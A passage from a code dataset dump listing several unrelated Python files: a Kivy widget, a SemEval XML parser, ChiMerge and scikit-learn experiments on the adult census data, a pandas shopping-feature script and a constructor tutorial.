index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
18,300 | 151cead9befe305e5370a2ace563c24e45b7dd8b | from kivy.uix.boxlayout import BoxLayout
from kivy.properties import ObjectProperty
from kivy.lang import Builder
Builder.load_string("""
<MenuButtonWidget>:
Button:
text: 'Menu'
on_press: root.miniGameWidget.on_press_menu()
""")
class MenuButtonWidget(BoxLayout):
    """Widget holding the single 'Menu' Button declared in the kv rule above.

    Pressing the button calls ``miniGameWidget.on_press_menu()``.
    """
    # Reference to the owning mini-game widget; presumably assigned by the
    # creator before the button can be pressed -- TODO confirm against callers.
    miniGameWidget = ObjectProperty()
|
18,301 | 9764b810687bb91f220874a4a169fe7b25ccdb66 | try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
from enum import Enum
import re
from itertools import chain
# The four kinds of semeval identifiers: original question, related question,
# related comment, or unrecognised.
id_classification = Enum('id_classification', 'org rel com none')
#############################
# defining pseudo constants #
#############################
"""The following regex, though hard to look at, perform the simple task of capturing:
- the original id,
- the related id,
- and the comment id.
Examples:
- 'Q4' matches the groups ('Q4', None, None)
- 'Q4_R8' matches the groups ('Q4', 'R8', None)
- 'Q4_R8_C154' matches the groups ('Q4', 'R8', 'C154')
- 'R8' does not match
"""
# BUG FIX: the comment group previously read (C[0-9]) -- one digit only -- so
# 'Q4_R8_C154' captured just 'C1'.  The '+' matches the whole number, as the
# docstring examples require.
ID_EXTRACTION_REGEX = r'(Q[0-9]+)(?:_(R[0-9]+)(?:_(C[0-9]+))?)?'
##################################
# helper functions to xmlextract #
##################################
def classify_id(identifier):
    """Gives information about an id.
    Parameters
    ----------
    identifier : str
        The identifier to classify.
    Returns
    -------
    out : tuple
        The classification of the identifier,
        the first element being the classification proper and
        the next three elements are:
        - the org fragment (ex Q268),
        - the rel fragment (ex _R4), and
        - the comment fragment (ex _C2).
        Unrecognised identifiers yield the 1-tuple (id_classification.none,).
    """
    match = re.match(ID_EXTRACTION_REGEX, identifier)
    if match:
        result = match.groups()
        # The regex fills its groups left to right, so the number of non-None
        # groups alone identifies the kind of id.
        group_number = sum(group is not None for group in result)
        kind_by_count = {
            1: id_classification.org,
            2: id_classification.rel,
            3: id_classification.com,
        }
        if group_number in kind_by_count:
            return (kind_by_count[group_number], ) + result
    return (id_classification.none,)
##############################
# semeval element retrievers #
##############################
def get_orgquestion_content(orgquestion):
    """Retrieve the content of an original question element.
    That is to say the textual content of both the subject and the body,
    joined by '. '.
    Parameters
    ----------
    orgquestion : ET.Element
        The original question from which to get the text.
    Returns
    -------
    out : str
        The textual content of the original question.
    """
    parts = []
    for tag in ('OrgQSubject', 'OrgQBody'):
        # Look the child up once (the original called find() twice per tag)
        # and tolerate a missing child as well as an empty text node.
        node = orgquestion.find(tag)
        text = node.text if node is not None else None
        parts.append(text if text is not None else '')
    return '. '.join(parts)
def get_relquestion_content(relquestion):
    """Retrieve the content of an related question element.
    That is to say the textual content of both the subject and the body,
    joined by '. '.
    Parameters
    ----------
    relquestion : ET.Element
        The related question from which to get the text.
    Returns
    -------
    out : str
        The textual content of the related question.
    """
    parts = []
    for tag in ('RelQSubject', 'RelQBody'):
        # Look the child up once (the original called find() twice per tag)
        # and tolerate a missing child as well as an empty text node.
        node = relquestion.find(tag)
        text = node.text if node is not None else None
        parts.append(text if text is not None else '')
    return '. '.join(parts)
def get_relcomment_content(relcomment):
    """Retrieve the content of an related comment element.
    That is to say its textual content (the text of its RelCText child).
    Parameters
    ----------
    relcomment : ET.Element
        The related comment from which to get the text.
    Returns
    -------
    out : str
        The textual content of the related comment.
    """
    text_node = relcomment.find('RelCText')
    return text_node.text
def get_semeval_content(element):
    """Retrieve the content of a semeval element.
    That is to say the textual content of the both the subject and the body.
    Parameters
    ----------
    element : ET.Element
        The original question, related question or related comment to get the text from.
    Returns
    -------
    out : str
        The text of the element, or None for an unknown tag.
    """
    tag = element.tag
    # A thread delegates to the related question it wraps.
    if tag == 'Thread':
        return get_relquestion_content(element.find('./RelQuestion'))
    dispatch = {
        'OrgQuestion': get_orgquestion_content,
        'RelQuestion': get_relquestion_content,
        'RelComment': get_relcomment_content,
    }
    handler = dispatch.get(tag)
    return handler(element) if handler is not None else None
def get_semeval_content_with_relcomments(element):
    """Retrieve the content of a semeval element, related comment included.
    That is to say an original question will return the textual content of the subject and the body whereas a related thread will return the textual content of the subject, the body and the comment.
    For consistency's sake, if the element is a comment, its content will still be returned.
    None is returned if the element is a related question.
    Parameters
    ----------
    element : ET.Element
        The original question, related question or related comment to get the text from.
    Returns
    -------
    out : str
        The text of the element.
    """
    tag = element.tag
    if tag == 'OrgQuestion':
        return get_orgquestion_content(element)
    if tag == 'RelComment':
        return get_relcomment_content(element)
    if tag == 'Thread':
        # Question text first, then every comment, space-separated.
        pieces = [get_relquestion_content(element.find('./RelQuestion'))]
        pieces.extend(get_relcomment_content(comment)
                      for comment in element.findall('./RelComment'))
        return ' '.join(pieces)
    return None
def get_semeval_id(element):
    """Retrieve the id of a semeval element.
    Parameters
    ----------
    element : ET.Element
        The original question, related question or related comment from which to extract the id.
    Returns
    -------
    out : str
        The id of the element, or None for an unknown tag.
    """
    # Map each known tag onto the attribute that carries its identifier.
    attribute_by_tag = {'OrgQuestion': 'ORGQ_ID',
                        'RelQuestion': 'RELQ_ID',
                        'RelComment': 'RELC_ID',
                        'Thread': 'THREAD_SEQUENCE'}
    key = attribute_by_tag.get(element.tag)
    if key is None:
        return None
    return element.attrib[key]
def get_semeval_relevance_orgq(element):
    """Retrieve the relevance of a semeval element, in regards with its original question.
    Parameters
    ----------
    element : ET.Element
        The related question or related comment from which to get the relevance.
    Returns
    -------
    out : str
        The relevance of the element, or None for an unknown tag.
    """
    attribute_by_tag = {
        'RelQuestion': 'RELQ_RELEVANCE2ORGQ',
        'RelComment': 'RELC_RELEVANCE2ORGQ',
    }
    key = attribute_by_tag.get(element.tag)
    return element.attrib[key] if key is not None else None
# Relevance labels that count as "relevant" to the original question.
RELEVANT_TAGS = {'Good', 'PerfectMatch'}
def is_relevant_to_orgq(element):
    """Check if a semeval element is relevant to its original question.
    Parameters
    ----------
    element : ET.Element
        The related question or related comment.
    Returns
    -------
    out : boolean
        True if the element is relevant.
    """
    return get_semeval_relevance_orgq(element) in RELEVANT_TAGS
def get_related_questions(element):
    """Retrieve the related question from an element.
    This element can be:
    - original question
    - related question (returns itself)
    - thread
    - full tree
    Parameters
    ----------
    element : ET.element
        The element from which to extract the related questions.
    Returns
    -------
    out : list of ET.element
    """
    path_by_tag = {
        'OrgQuestion': './Thread/RelQuestion',
        'Thread': './RelQuestion',
        'RelQuestion': '.',
    }
    # Unknown tags are treated as the full tree root.
    path = path_by_tag.get(element.tag, './OrgQuestion/Thread/RelQuestion')
    return element.findall(path)
def get_related_threads(element):
    """Retrieve the related threads from an element.
    This element can be:
    - original question
    - related thread (returns itself)
    - full tree
    Parameters
    ----------
    element : ET.element
        The element from which to extract the related thread.
    Returns
    -------
    out : list of ET.element
    """
    path_by_tag = {
        'OrgQuestion': './Thread',
        'Thread': '.',
    }
    # Unknown tags are treated as the full tree root.
    path = path_by_tag.get(element.tag, './OrgQuestion/Thread')
    return element.findall(path)
class xmlextract(object):
    """Open an xml from semeval and allow to easily extract informations from it.
    Most methods in this module return an ElementTree object, with the notable exception of the *ids methods and of get_all_text.
    """
    def __init__(self, xml_filename):
        """Initialize the extractor.
        Parameters
        ----------
        xml_filename : str
            The name of the source file.
        """
        self.source = xml_filename
        self.tree = ET.parse(self.source)
        self.root = self.tree.getroot()
        # Normalise the tree right away: afterwards each original question
        # appears exactly once, with all of its threads gathered under it.
        self.merge_original_questions()
    def merge_original_questions(self):
        """Merges together the subtrees of original questions sharing the same IDs.
        The original structure looks like
        Root
        |
        |__OrgQuestion<Org_ID1>
        |   |
        |   |__(subject and body)
        |   |
        |   |__Thread<Thread_ID1>
        |       |
        |       |__RelQuestion
        |       |   |
        |       |   |__...
        |       |
        |       |__RelComment +
        |           |__...
        |
        |__OrgQuestion<Org_ID1> # Same original question
        |   |
        |   ...
        |   |
        |   |__Thread<Thread_ID2> # New thread
        |       |
        ...     ...
        The merged structure looks like
        Root
        |
        |__Orgquestion<ID1>
        |   |
        |   |__(subject and body)
        |   |
        |   |__Thread<Thread_ID1>
        |   |   |
        |   |   ...
        |   |
        |   |__Thread<Thread_ID2> # The threads are now gathered at the same level
        |   |   |
        |   |   ...
        |   ...
        |
        |__OrgQuestion<ID2> # Next original question
        |   |
        |   ...
        ...
        """
        self.merged_tree = ET.ElementTree()
        self.merged_root = self.root
        ids_encountered = set()
        for org_question in self.merged_root.findall('./OrgQuestion'):
            org_id = org_question.attrib['ORGQ_ID']
            if org_id not in ids_encountered:
                # First sighting of this ID: this subtree is the merge target.
                current_subtree = org_question  # works because assignment has reference semantics
                ids_encountered.add(org_id)
            else:
                # Duplicate: move its thread under the first sighting, then
                # remove the now-redundant duplicate from the tree.
                current_subtree.append(org_question.find('./Thread'))
                self.root.remove(org_question)
        self.merged_tree._setroot(self.merged_root)
    def get_org_questions_ids(self):
        """Retrieve the original questions' IDs.
        Returns
        -------
        out : list of str
            The list of the original questions IDs.
        """
        return [q.attrib['ORGQ_ID'] for q in self.merged_root.findall('OrgQuestion')]
    #######################
    # elements extraction #
    #######################
    def get_org_elements(self):
        """Retrieve the elements of the original questions.
        Returns
        -------
        out : list of ET.element
        """
        return self.merged_root.findall('OrgQuestion')
    def get_rel_elements(self):
        """Retrieve the elements of the related questions.
        Returns
        -------
        out : list of ET.element
        """
        return self.merged_root.findall('OrgQuestion/Thread/RelQuestion')
    #######################################
    # retrieve specific elements from ids #
    #######################################
    def get_org_question(self, org_id):
        """Retrieve an original question using its id.
        Parameters
        ----------
        org_id : str
            The ID of the original question.
        Returns
        -------
        out : ET.Element
            The original question element if found, None otherwise.
        """
        for question in self.merged_root.iter('OrgQuestion'):
            if question.attrib['ORGQ_ID'] == org_id:
                return question
        return None
    def get_rel_thread(self, org_id, rel_id):
        """Retrieve a related thread using its original ID and its related ID.
        Parameters
        ----------
        org_id : str
            The original ID of the thread.
        rel_id : str
            The related ID of the thread.
        Returns
        -------
        out : ET.Element
            The related thread element if found, None otherwise.
        """
        # THREAD_SEQUENCE is the concatenation '<org_id>_<rel_id>'.
        # NOTE(review): raises AttributeError when org_id is unknown
        # (get_org_question returns None) -- confirm intent.
        for thread in self.get_org_question(org_id).iter('Thread'):
            if thread.attrib['THREAD_SEQUENCE'] == org_id + "_" + rel_id:
                return thread
        return None
    def get_rel_question(self, org_id, rel_id):
        """Retrieve a related question using its original ID and its related ID.
        Parameters
        ----------
        org_id : str
            The original ID of the question.
        rel_id : str
            The related ID of the question.
        Returns
        -------
        out : ET.Element
            The related question element if found, None otherwise.
        """
        # NOTE(review): raises AttributeError (None.find) when the thread is
        # not found, rather than returning None -- confirm intent.
        return self.get_rel_thread(org_id, rel_id).find('./RelQuestion')
    def get_rel_comment(self, org_id, rel_id, com_id):
        """Retrieve a related comment using its original ID, its related ID and its comment ID.
        Parameters
        ----------
        org_id : str
            The original ID of the comment.
        rel_id : str
            The related ID of the comment.
        com_id : str
            The comment ID of the comment.
        Returns
        -------
        out : ET.Element
            The related comment element if found, None otherwise.
        """
        # RELC_ID is the concatenation '<org_id>_<rel_id>_<com_id>'.
        for comment in self.get_rel_thread(org_id, rel_id).iter('RelComment'):
            if comment.attrib['RELC_ID'] == org_id + '_' + rel_id + '_' + com_id:
                return comment
        return None
    #################################
    # retrieve any element from ids #
    #################################
    def get_element_from_id(self, identifier):
        """Retrieve an element from its ID.
        The element in question can either be an original question, a related question or a related comment.
        Parameters
        ----------
        identifier : str
            ID of the element (corresponding to an ORGQ_ID, RELQ_ID or RELC_ID).
        Returns
        -------
        out : ET.Element
            The asked-for element if it was found, None otherwise.
        """
        # classify_id tells which lookup to perform from the id shape alone.
        classification, org, rel, com = classify_id(identifier)
        if classification == id_classification.org:
            return self.get_org_question(org)
        elif classification == id_classification.rel:
            return self.get_rel_question(org, rel)
        elif classification == id_classification.com:
            return self.get_rel_comment(org, rel, com)
        return None
    ###########################
    # extracting path from id #
    ###########################
    def findall_path_from_org_id(self, path, org_id):
        """Retrieve instances of an xml path from the tree of an original question, identified by its ID.
        Parameters
        ----------
        path : str
            XML path to extract.
        org_id : str
            ID of the original question.
        Returns
        -------
        out : list of ET.Element
            The list of elements matching the path and the original question ID.
        """
        for org_question in self.merged_root.iter('OrgQuestion'):
            if org_question.attrib['ORGQ_ID'] == org_id:
                extraction = org_question.findall(path)
                if len(extraction) != 0:
                    return extraction
        # Unknown id or no match anywhere: empty list.
        return list()
    def find_path_from_org_id(self, path, org_id):
        """Retrieve the first xml path from the tree of an original question, identified by its ID.
        Parameters
        ----------
        path : str
            XML path to extract.
        org_id : str
            ID of the original question.
        Returns
        -------
        out : ET.Element
            The first element matching the path and the original question ID.
        """
        for org_question in self.merged_root.iter('OrgQuestion'):
            if org_question.attrib['ORGQ_ID'] == org_id:
                extraction = org_question.find(path)
                if extraction is not None:
                    return extraction  # only returns if a path was found
        return None
    ###################
    # text extraction #
    ###################
    def get_all_text(self):
        """Retrieve all the textual contents from the source file.
        This includes :
        - The original subject.
        - The original body.
        - The related subject.
        - The related body.
        - The related comments.
        Returns
        -------
        out : list of str
            The list of all the textual contents.
        """
        result = list()
        # NOTE(review): the last path ends with '/' and so appears to target
        # the children of RelComment rather than RelComment itself -- confirm
        # this is intentional.
        for path in ['./OrgQuestion/OrgQSubject',
                     './OrgQuestion/OrgQBody',
                     './OrgQuestion/Thread/RelQuestion/RelQSubject',
                     './OrgQuestion/Thread/RelQuestion/RelQBody',
                     './OrgQuestion/Thread/RelComment/']:
            result.extend([
                element.text if element.text is not None else '' for element in self.merged_root.findall(path)
            ])  # extract text from each element matching the path
        return result
|
18,302 | e421b88948f03b77bbaf5f042a6e4e586ee73854 | a=input()
import math
# NOTE(review): Python 2 script -- `print` statement below, and `a` is read on
# the previous line via input() (implicit eval in Python 2).
# Reduce the input modulo 1.5, then evaluate the cubic x**3 - 2.25*x there.
x=math.fmod(a,1.5)
# Print the result rounded to one decimal place.
print round(x*x*x-2.25*x,1)
|
18,303 | 3982608cf0be3033c8a4241333c1829f9d80ff4a | import sys
import numpy as np
import json
from chimerge import ChiMerge
from chi2 import Chi2
import utils
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import StratifiedKFold
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
def sparse_to_matrix(data):
    """Convert a list of feature groups into a dense 0/1 indicator matrix.

    Parameters
    ----------
    data : list of iterables
        Each element is the collection of (hashable) features present in one
        sample.
    Returns
    -------
    numpy.ndarray of shape (len(data), n_distinct_features)
        X[i, j] == 1 iff sample i contains feature j.  Column order follows
        set iteration order and is therefore unspecified.
    """
    n = len(data)
    vals = list(set([x for g in data for x in g]))
    # Map feature -> column index in O(m) instead of the original
    # O(m^2) dict comprehension that called vals.index(v) per feature.
    fea2idx = {v: i for i, v in enumerate(vals)}
    m = len(vals)
    X = np.zeros((n, m))
    for i, g in enumerate(data):
        for v in g:
            X[i, fea2idx[v]] = 1
    return X
def output_matrix(data, Y):
    # Print each row of the dense matrix followed by its label, all
    # tab-separated, one sample per line.  (Python 2 print statement.)
    for i in range(data.shape[0]):
        ptr = []
        for j in range(data.shape[1]):
            ptr.append(data[i,j])
        print '\t'.join(map(str, ptr)) + '\t' + str(Y[i,0])
def output_case(data, feature_names, label):
    # Print one sample's non-zero features as "name:value" pairs on a single
    # line, followed by its label.  (Python 2 print statement; the trailing
    # comma suppresses the newline between pairs.)
    data = np.asarray(data).flatten()
    print data
    L = len(feature_names)
    ptr = {}
    for i in range(L):
        ptr[feature_names[i]] = data[i]
    for k, v in ptr.items():
        if v != 0:
            print str(k) + ':' + str(v),
    print label
def feature_importance_learning(dataTrain, labelTrain, feature_names, cut_ratio):
    '''
    LR, RF
    Rank features by RandomForest feature importance over stratified folds
    and return the names of the top cut_ratio fraction.  (Python 2 code.)
    '''
    n_folds = 3
    feature_candidates = {}
    features_learned = {}
    depth = 40
    for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(labelTrain).flatten(), n_folds=n_folds, shuffle=True)):
        X_train, X_test = dataTrain[train_index], dataTrain[test_index]
        y_train, y_test = labelTrain[train_index], labelTrain[test_index]
        clf = RandomForestClassifier(max_depth=depth, random_state=0)
        clf.fit(X_train, y_train)
        # NOTE(review): the loop index `i` is shadowed here and the
        # importances dict is overwritten each fold, so only the last fold's
        # importances survive -- confirm this is intended.
        for i in range(len(feature_names)):
            features_learned[feature_names[i]] = clf.feature_importances_[i]
    feature_num = len(feature_names)
    cut_number = int(feature_num * cut_ratio)
    # Sort features by importance, descending (utils helper).
    feature_candidates = utils.sortDictByValue(features_learned, True)
    print 'Features numbers: ', feature_num, 'Now: ', cut_number
    features = [x[0] for x in feature_candidates[:cut_number]]
    return features
def process_adult_trad(attribute_column, min_expected_value, max_number_intervals, threshold, debug_info):
    # Baseline pipeline on the raw (non-discretized) adult features:
    # RF-based feature selection, then LogisticRegression cross-validated
    # over several C values.  (Python 2 code: print statements.)
    attributes = [('age', 'i8'), ('workclass', 'S40'), ('fnlwgt', 'i8'), ('education', 'S40'), ('education-num', 'i8'), ('marital-status', 'S40'), ('occupation', 'S40'), ('relationship', 'S40'), ('race', 'S40'), ('sex', 'S40'), ('capital-gain', 'i8'), ('capital-loss', 'i8'), ('hours-per-week', 'i8'), ('native-country', 'S40'), ('pay', 'S40')]
    datatype = np.dtype(attributes)
    # BOW model
    data, Y, feature_names = _readAdultDataSet(attribute_column, attributes)
    n_folds = 3
    #dataTrain = np.asarray(data)
    #labelTrain = np.asarray(Y)
    #for cut_ratio in [0.2, 0.4, 0.6, 0.8, 1]:
    for cut_ratio in [1]:
        # Keep only the columns selected by RF importance ranking.
        feature_selected = feature_importance_learning(np.asarray(data), np.asarray(Y), feature_names, cut_ratio)
        data_idx = []
        for i in range(len(feature_names)):
            if feature_names[i] in feature_selected:
                data_idx.append(i)
        data_selected = data[:, data_idx]
        dataTrain = np.asarray(data_selected)
        labelTrain = np.asarray(Y)
        alphas = [0.5, 1, 5, 10, 100]
        #alphas = [10, 20, 50, 200]
        for alpha in alphas:
            score_train = []
            score_test = []
            for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(Y).flatten(), n_folds=n_folds, shuffle=True)):
                #clf = SVC(class_weight='balanced', kernel='linear', C=alpha)
                #clf = RandomForestClassifier(max_depth=alpha, random_state=0)
                clf = LogisticRegression(penalty='l2', C=alpha)
                #clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(100, 5), random_state=1)
                X_train, X_test = dataTrain[train_index], dataTrain[test_index]
                y_train, y_test = labelTrain[train_index], labelTrain[test_index]
                clf.fit(X_train, y_train)
                pred_train = clf.predict(X_train)
                pred_test = clf.predict(X_test)
                score_train.append(metrics.accuracy_score(y_train, pred_train))
                score_test.append(metrics.accuracy_score(y_test, pred_test))
                """
                class_coefs1 = {}
                print clf.coef_.shape
                for i in range(clf.coef_.shape[1]):
                    class_coefs1[feature_names[i]] = clf.coef_[0, i]
                sorted_class_coefs1 = utils.sortDictByValue(class_coefs1, True)
                print sorted_class_coefs1
                """
                """
                for i in range(len(y_train)):
                    if y_train[i] != pred_train[i]:
                        output_case(data[i,:], feature_names, y_train[i])
                """
            print 'cut_ratio:', cut_ratio, 'alpha:', alpha, 'Average accuracy, train: ', 1.*sum(score_train)/len(score_train), 'test: ', 1.*sum(score_test)/len(score_test)
def process_adult_bml(attribute_column, min_expected_value, max_number_intervals, threshold, debug_info, mode='SK'):
    # Discretize the adult dataset with ChiMerge, expand features with the
    # AddFeatures model, then cross-validate either sklearn models ('SK')
    # or a factorization machine ('FM').  (Python 2 code: print statements.)
    attributes = [('age', 'i8'), ('workclass', 'S40'), ('fnlwgt', 'i8'), ('education', 'S40'), ('education-num', 'i8'), ('marital-status', 'S40'), ('occupation', 'S40'), ('relationship', 'S40'), ('race', 'S40'), ('sex', 'S40'), ('capital-gain', 'i8'), ('capital-loss', 'i8'), ('hours-per-week', 'i8'), ('native-country', 'S40'), ('pay', 'S40')]
    datatype = np.dtype(attributes)
    chi = ChiMerge(min_expected_value, max_number_intervals, threshold, debug_info)
    # BOW model
    data, Y, feature_names = _readAdultDataSet(attribute_column, attributes)
    # Chimerge: discretize each column independently against the labels.
    discretizationIntervals = {}
    discretizationDtype = []
    for i in range(data.shape[1]):
        chiData = np.concatenate((data[:,i], Y), axis=1)
        chi.loadData(chiData, False)
        chi.generateFrequencyMatrix()
        chi.chimerge()
        #chi.printDiscretizationInfo(feature_names[i])
        discretizationIntervals[feature_names[i]] = chi.frequency_matrix_intervals
        discretizationDtype.append((feature_names[i], 'i8'))
    # addfeatures: map every sample into the discretized feature space.
    from addfeatures import AddFeatures
    af_model = AddFeatures()
    X_parsed = []
    for i in range(data.shape[0]):
        input_stream = np.zeros((1,),dtype=object)
        input_stream[0] = np.asarray(data[i,:])
        X_slots = af_model.fit_transform(data=input_stream, dttyp=np.dtype(discretizationDtype), discret_intervals=discretizationIntervals)
        X_parsed.append(X_slots)
    """
    dv = DictVectorizer(sparse=False)
    dataTrain = dv.fit_transform(X_parsed)
    labelTrain = Y[:,0]
    """
    # fm training
    #print af_model.reversed_table
    ori_features_len = len(set(af_model.reversed_table.keys()))
    parsed_features_len = len(set(af_model.reversed_table.values()))
    print "Features space transforms from %d-dim to %d-dim" % (ori_features_len, parsed_features_len)
    dataTrain = sparse_to_matrix(X_parsed)
    labelTrain = Y[:,0]
    # NOTE(review): the function unconditionally prints the matrix and exits
    # here, so the k-fold code below never runs -- presumably leftover from
    # debugging; confirm before relying on the validation results.
    output_matrix(dataTrain, labelTrain)
    sys.exit(0)
    """
    for i in range(dataTrain.shape[0]):
        for j in range(dataTrain.shape[1]):
            print dataTrain[i,j],
        print ''
    """
    # kfold validation
    from factorization_machine import FactorizationMachineClassification
    from sklearn.svm import SVC
    from sklearn import metrics
    from sklearn.linear_model import LogisticRegression
    from sklearn.cross_validation import StratifiedKFold
    n_folds = 3
    # This following models contains Sklearn models and FM model, pick one
    # SK models
    if mode == 'SK':
        alphas = [0.5, 1, 5, 10, 100, 1000]
        for alpha in alphas:
            score_train = []
            score_test = []
            for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(labelTrain).flatten(), n_folds=n_folds, shuffle=True)):
                #clf = SVC(class_weight='balanced', kernel='rbf', C=alpha)
                clf = LogisticRegression(penalty='l1', C=alpha)
                #clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(100, 3), random_state=1, max_iter=1000)
                X_train, X_test = dataTrain[train_index], dataTrain[test_index]
                y_train, y_test = labelTrain[train_index], labelTrain[test_index]
                clf.fit(X_train, y_train)
                pred_train = clf.predict(X_train)
                pred_test = clf.predict(X_test)
                score_train.append(metrics.accuracy_score(y_train, pred_train))
                score_test.append(metrics.accuracy_score(y_test, pred_test))
            print 'alpha:', alpha, 'Average accuracy, train: ', 1.*sum(score_train)/len(score_train), 'test: ', 1.*sum(score_test)/len(score_test)
    elif mode == 'FM':
        # FM model: a single fold is enough here (break after the first).
        fm = FactorizationMachineClassification()
        for i, (train_index, test_index) in enumerate(StratifiedKFold(np.asarray(labelTrain).flatten(), n_folds=n_folds, shuffle=True)):
            X_train, X_test = dataTrain[train_index], dataTrain[test_index]
            y_train, y_test = labelTrain[train_index], labelTrain[test_index]
            #w0, w, v = fm.fit_and_validate(np.mat(X_train), y_train, np.mat(X_test), y_test, 3, 10000, 0.01, True)
            w0, w, v = fm.fit_and_validate(np.mat(X_train), y_train, np.mat(X_test), y_test, 3, 10000, 0.01)
            break
    else:
        print 'Pick a mode [SK|FM]'
def _readAdultDataSet(attribute_column=-1, attributes=None):
    """
    Reference: http://archive.ics.uci.edu/ml/machine-learning-databases/adult/
    e.g. 39, State-gov, 77516, Bachelors, 13, Never-married, Adm-clerical, Not-in-family, White, Male, 2174, 0, 40, United-States, <=50K
    >50K, <=50K.
    age: continuous.
    workclass: Private, Self-emp-not-inc, Self-emp-inc, Federal-gov, Local-gov, State-gov, Without-pay, Never-worked.
    fnlwgt: continuous.
    education: Bachelors, Some-college, 11th, HS-grad, Prof-school, Assoc-acdm, Assoc-voc, 9th, 7th-8th, 12th, Masters, 1st-4th, 10th, Doctorate, 5th-6th, Preschool.
    education-num: continuous.
    marital-status: Married-civ-spouse, Divorced, Never-married, Separated, Widowed, Married-spouse-absent, Married-AF-spouse.
    occupation: Tech-support, Craft-repair, Other-service, Sales, Exec-managerial, Prof-specialty, Handlers-cleaners, Machine-op-inspct, Adm-clerical, Farming-fishing, Transport-moving, Priv-house-serv, Protective-serv, Armed-Forces.
    relationship: Wife, Own-child, Husband, Not-in-family, Other-relative, Unmarried.
    race: White, Asian-Pac-Islander, Amer-Indian-Eskimo, Other, Black.
    sex: Female, Male.
    capital-gain: continuous.
    capital-loss: continuous.
    hours-per-week: continuous.
    native-country: United-States, Cambodia, England, Puerto-Rico, Canada, Germany, Outlying-US(Guam-USVI-etc), India, Japan, Greece, South, China, Cuba, Iran, Honduras, Philippines, Italy, Poland, Jamaica, Vietnam, Mexico, Portugal, Ireland, France, Dominican-Republic, Laos, Ecuador, Taiwan, Haiti, Columbia, Hungary, Guatemala, Nicaragua, Scotland, Thailand, Yugoslavia, El-Salvador, Trinadad&Tobago, Peru, Hong, Holand-Netherlands.
    Returns a (features, labels, feature_names) triple built with a
    DictVectorizer over the one-hot-encoded string columns, or None for an
    out-of-range attribute_column / missing attributes.
    :return:
    """
    if attribute_column < -1 or attribute_column > 15:
        return
    if attribute_column == -1:
        attribute_columns = range(15)
    else:
        attribute_columns = [attribute_column]
    # NOTE(review): attribute_columns is computed but never used below --
    # every attribute in `attributes` is always read; confirm intent.
    # BUG FIX: identity comparison for None (was `attributes == None`).
    if attributes is None:
        return
    datatype = np.dtype(attributes)
    #pathfn = 'adult/adult.data'
    pathfn = 'adult/adult.small'
    #pathfn = 'adult/adult.1w'
    data = []
    Y = []
    with open(pathfn, 'r') as f:
        for line in f:
            tmpdict = {}
            tmp = line.replace(' ', '').replace(':', '-').strip().split(',')
            tmp = np.array(tuple(tmp), dtype=datatype)
            for g in attributes:
                typ = g[0]
                value = tmp[typ]
                # 'pay' is the label column: +1 for >50K, -1 for <=50K.
                # NOTE(review): the comparisons assume Python 2 str/bytes
                # semantics for the S40-typed values -- confirm under py3.
                if g[0] == 'pay' and value == '>50K':
                    Y.append(1)
                elif g[0] == 'pay' and value == '<=50K':
                    Y.append(-1)
                elif value.dtype == np.dtype('S40'):
                    # One-hot encode categorical columns as 'name<delim>value'.
                    #tag = str(typ) + BaseC.DISCRET_DELIMITER + str(value)
                    tag = utils.mergeKeyValue(str(typ), str(value), 'discret')
                    tmpdict[tag] = 1
                else:
                    tmpdict[typ] = value
            data.append(tmpdict)
    dv = DictVectorizer(sparse=False)
    X = dv.fit_transform(data)
    return np.matrix(X, dtype='i8'), np.matrix(Y).T, dv.get_feature_names()
# ChiMerge paper: https://www.aaai.org/Papers/AAAI/1992/AAAI92-019.pdf
if __name__ == '__main__':
    # Run the ChiMerge-based pipeline over all attribute columns.
    process_adult_bml(attribute_column=-1, min_expected_value=0.5, max_number_intervals=15, threshold=4.61, debug_info=False, mode='SK')
    #process_adult_trad(attribute_column=-1, min_expected_value=0.5, max_number_intervals=6, threshold=4.61, debug_info=False)
|
18,304 | bbd0e59808a55c79bdce5ce95049683785caf51c | '''
Build the following fields from member users' interest features:
shopping season: spring, summer, autumn, winter
shopping time slot: early morning, morning, noon, afternoon, evening
The constructed features are saved to the file "task3_3.csv".
'''
import pandas as pd
data = pd.read_csv('../../data/task3_2.csv')
task1 = pd.read_csv('../../data/会员购物情况表.csv',low_memory=False)
print(data.shape) #(142701, 9)
print(task1.shape) #(1013660, 12)
# Shopping season: bucket the purchase month.  Bins put Dec-Feb in winter;
# the duplicate trailing winter label ('冬') is folded back into '冬天' below,
# since pd.cut labels must be unique.
task1['消费时间'] = pd.to_datetime(task1['消费时间'])
task1['季节'] = pd.cut(task1['消费时间'].dt.month,
                     bins=[0,2,5,8,11,13],
                     labels=['冬天','春天','夏天','秋天','冬'])
task1.loc[task1['季节']=='冬','季节'] = '冬天'
df = task1[['会员卡号','季节']].groupby(by='会员卡号').max()
data = pd.merge(data,df,on='会员卡号',how='left')
# Shopping time slot: bucket the purchase hour.  Rows whose slot is NaN
# (e.g. hour 0 falling outside the left-open first bin -- TODO confirm)
# are dropped before aggregating.
task1['购物时间段'] = pd.cut(task1['消费时间'].dt.hour,
                        bins=[0,6,11,14,18,24],
                        labels=['凌晨','上午','中午','下午','晚上'])
task1.drop(task1[task1['购物时间段'].isnull().values==True].index,inplace=True)
df1 = task1[['会员卡号','购物时间段']].groupby(by='会员卡号').max()
data = pd.merge(data,df1,on='会员卡号',how='left')
# Save the constructed features.
data.to_csv('../../data/task3_3.csv',index=False)
18,305 | b23c8a42bae149d6a49fe5aa178407890ff06e40 | #1.
class defaultcon:
    """Demonstrates a default (no-argument) constructor."""
    def __init__(self):
        # The constructor simply initialises one data member.
        self.geek = "defaultconstructor"
    def print_defaultcon(self):
        """Print the data member set by the constructor."""
        print(self.geek)
# Instantiate via the default constructor, then call the printing method.
obj = defaultcon()
obj.print_defaultcon()
class Addition:
    """Adds the two numbers supplied to its parameterized constructor."""
    # class-level defaults
    first = 0
    second = 0
    answer = 0
    def __init__(self, f, s):
        # store both operands on the instance
        self.first, self.second = f, s
    def display(self):
